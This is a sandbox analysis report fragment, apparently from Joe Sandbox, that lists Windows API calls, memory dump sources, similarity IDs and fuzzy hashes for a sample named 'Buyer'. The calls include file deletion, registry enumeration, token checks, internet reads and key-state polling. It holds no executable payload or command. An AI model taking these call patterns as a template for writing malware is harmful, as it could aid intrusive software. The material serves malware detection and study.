                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F45487
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00F8466F,?,?,00F45184,?,00000001,?,?,00000000), ref: 00F4549A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-1355242751
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB32EE
                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00FB3370
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FB3386
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB3397
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FB33A9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$Copy
                                                                                                    • String ID:
                                                                                                    • API String ID: 3226157194-0
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00FCABAE
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FCABBC
                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FCABEF
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00FCADC4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3488606520-0
                                                                                                    APIs
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                      • Part of subcall function 00FCD11F: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FCBE35,?,?), ref: 00FCD13C
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD178
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD1E6
                                                                                                      • Part of subcall function 00FCD11F: _wcslen.LIBCMT ref: 00FCD21C
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FCC22C
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FCC287
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FCC2EA
                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00FCC32D
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00FCC33A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 826366716-0
                                                                                                    • Opcode ID: a002e4bb6a39b07f602bb3b6542c839bde723494b9ff427ff213ecf2919672eb
                                                                                                    • Instruction ID: 1ff18c694044d03e5ec552c4effbc527a425f857c778891cd1ff303e6d589337
                                                                                                    • Opcode Fuzzy Hash: a002e4bb6a39b07f602bb3b6542c839bde723494b9ff427ff213ecf2919672eb
                                                                                                    • Instruction Fuzzy Hash: 7461D131608242AFC714DF64C981F6ABBE5FF84318F04855DF4998B292CB35ED46EB92
                                                                                                    APIs
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FAD507,?), ref: 00FAE43E
                                                                                                      • Part of subcall function 00FAE421: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FAD507,?), ref: 00FAE457
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00FAEAB4
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00FAEAED
                                                                                                    • _wcslen.LIBCMT ref: 00FAEC2C
                                                                                                    • _wcslen.LIBCMT ref: 00FAEC44
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00FAEC91
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3183298772-0
                                                                                                    • Opcode ID: 597e9e36c3b2d44744a286a07cb880c8ba91f23bb8d6c4b040dae5694ea011a2
                                                                                                    • Instruction ID: 43b3550565a488443aac08c7388c905ce709a9a437b90fb12bcb848cf39a4bdc
                                                                                                    • Opcode Fuzzy Hash: 597e9e36c3b2d44744a286a07cb880c8ba91f23bb8d6c4b040dae5694ea011a2
                                                                                                    • Instruction Fuzzy Hash: 415184F24083859BC724EB60CC859DB77ECAF85310F00492EF685D3191EF78A688DB66
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00FA92C6
                                                                                                    • VariantClear.OLEAUT32 ref: 00FA9337
                                                                                                    • VariantClear.OLEAUT32 ref: 00FA9396
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00FA9409
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FA9434
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4136290138-0
                                                                                                    • Opcode ID: 8b8ab95935044d187d69adc3ea3027535920246d309e8f15b204aacac71e5aae
                                                                                                    • Instruction ID: 24b0d8b6db228b932931634c4940adf13f51216e71571ef539a708489de8d111
                                                                                                    • Opcode Fuzzy Hash: 8b8ab95935044d187d69adc3ea3027535920246d309e8f15b204aacac71e5aae
                                                                                                    • Instruction Fuzzy Hash: 48516BB5A00219EFCB10CF68C884AAAB7F9FF8D314B158169E909DB350D774E911CB90
                                                                                                    APIs
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FB931D
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00FB9349
                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FB93A1
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FB93C6
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FB93CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                    • String ID:
                                                                                                    • API String ID: 2832842796-0
                                                                                                    • Opcode ID: 560daba224e0e269b7515f261c9b9c3e072ef829fa4c33952933a78fd4aa0fe7
                                                                                                    • Instruction ID: 8f611c48c7094b67aa2dc566f66ce6233bd0ef6a2b5f5b725ec68cda7e5ae25b
                                                                                                    • Opcode Fuzzy Hash: 560daba224e0e269b7515f261c9b9c3e072ef829fa4c33952933a78fd4aa0fe7
                                                                                                    • Instruction Fuzzy Hash: FF513035A002199FCB05DF55C881AAEBBF6FF49314F088059E9496B362CB75ED41DF90
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00FC96C7
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00FC9757
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FC9773
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00FC97B9
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00FC97D9
                                                                                                      • Part of subcall function 00F5FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00FB172C,?,7529E610), ref: 00F5FAE3
                                                                                                      • Part of subcall function 00F5FAC6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00FA00EB,00000000,00000000,?,?,00FB172C,?,7529E610,?,00FA00EB), ref: 00F5FB0A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 666041331-0
                                                                                                    • Opcode ID: 2dda54b5023d16e1e134b986d7ece338a5a1346f1444595608342b83ca5740da
                                                                                                    • Instruction ID: 4a26c2f53adee062f25f09a614f98b7ca7391505147864ee97b73beb3e07fead
                                                                                                    • Opcode Fuzzy Hash: 2dda54b5023d16e1e134b986d7ece338a5a1346f1444595608342b83ca5740da
                                                                                                    • Instruction Fuzzy Hash: 33517C35A05206DFCB00DF58C595D99BBF1FF09324B048099E81A9B762C775ED86EF81
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00FD72FE
                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00FD7315
                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00FD733E
                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00FBB2E8,00000000,00000000), ref: 00FD7363
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00FD7392
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3688381893-0
                                                                                                    • Opcode ID: 3efe72b8c63fd6ef35ddebe3b22bf91bcd727fd52115aa9737136c02449e3f8a
                                                                                                    • Instruction ID: 0e38ff17f2c0c861b7882f7c9045f74279ac98195f04670e4989d56010d28041
                                                                                                    • Opcode Fuzzy Hash: 3efe72b8c63fd6ef35ddebe3b22bf91bcd727fd52115aa9737136c02449e3f8a
                                                                                                    • Instruction Fuzzy Hash: 7941B135A08244ABD724EF68CC44FA97B66EB05360F180266F859AB3A0E370AD01FA50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: d6c4d2688917687fb5a369ea2fa5debf26bae1a4005355e528e6986675f03e63
                                                                                                    • Instruction ID: e009ddebaec5f74f7747f6c7e708124cf5fe51b6609313ecd2df6162a40704d5
                                                                                                    • Opcode Fuzzy Hash: d6c4d2688917687fb5a369ea2fa5debf26bae1a4005355e528e6986675f03e63
                                                                                                    • Instruction Fuzzy Hash: 8141C436E002009FCB60DF78CC81A5EB3E5EF89714F15859AE519EB351D735AD01EB82
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00F4136E
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00F4138B
                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00F413C2
                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00F413DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4210589936-0
                                                                                                    • Opcode ID: 7b2f389d238d5c31c09bd35727b73d0a6d244b3c9165cce2d8fb65a56bc5d5dd
                                                                                                    • Instruction ID: d0839c7eeaa6907e7437e6c5247f99fb99d8ee1aad09d930faf71b1dadb9ff87
                                                                                                    • Opcode Fuzzy Hash: 7b2f389d238d5c31c09bd35727b73d0a6d244b3c9165cce2d8fb65a56bc5d5dd
                                                                                                    • Instruction Fuzzy Hash: 67419171A0411AFBDF05EF64C844BEEBB74FF05324F24822AE825A32A0C7346994EB51
                                                                                                    APIs
                                                                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00FBD6A7
                                                                                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 00FBD6DE
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD723
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD737
                                                                                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,00FBC98D,00000000), ref: 00FBD761
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 3191363074-0
                                                                                                    APIs
                                                                                                    • IsWindow.USER32(00000000), ref: 00FC10D8
                                                                                                    • GetForegroundWindow.USER32 ref: 00FC10EF
                                                                                                    • GetDC.USER32(00000000), ref: 00FC112B
                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00FC1137
                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00FC116F
                                                                                                    Similarity
                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 4156661090-0
                                                                                                    APIs
                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F7D117
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F7D13A
                                                                                                      • Part of subcall function 00F73B70: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F66A59,?,0000015D,?,?,?,?,00F68590,000000FF,00000000,?,?), ref: 00F73BA2
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F7D160
                                                                                                    • _free.LIBCMT ref: 00F7D173
                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F7D182
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 336800556-0
                                                                                                    APIs
                                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F598C9
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F598D8
                                                                                                    • BeginPath.GDI32(?), ref: 00F598EF
                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00F59918
                                                                                                    Similarity
                                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3225163088-0
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(0000000A,?,?,00F72B6D,00F6543F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F7314D
                                                                                                    • _free.LIBCMT ref: 00F73182
                                                                                                    • _free.LIBCMT ref: 00F731A9
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F731B6
                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F731BF
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3170660625-0
                                                                                                    APIs
                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?,?,00FA09E5), ref: 00FA06B2
                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06CD
                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06DB
                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?), ref: 00FA06EB
                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FA05C8,80070057,?,?), ref: 00FA06F7
                                                                                                    Similarity
                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3897988419-0
                                                                                                    APIs
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00FAEFD8
                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00FAEFE6
                                                                                                    • Sleep.KERNEL32(00000000), ref: 00FAEFEE
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00FAEFF8
                                                                                                    • Sleep.KERNEL32 ref: 00FAF034
                                                                                                    Similarity
                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                    • String ID:
                                                                                                    • API String ID: 2833360925-0
                                                                                                    APIs
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA17F6
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1802
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1811
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA127D,?,?,?), ref: 00FA1818
                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA182F
                                                                                                    Similarity
                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 842720411-0
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FA170C
                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1718
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1727
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA172E
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FA1744
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    APIs
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FA16AC
                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FA16B8
                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FA16C7
                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FA16CE
                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FA16E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    Similarity
                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 44706859-0
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB09F5
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A02
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A0F
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A1C
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00FB084E,?,00FB3A6B,?,00000001,00F83E59,?), ref: 00FB0A29
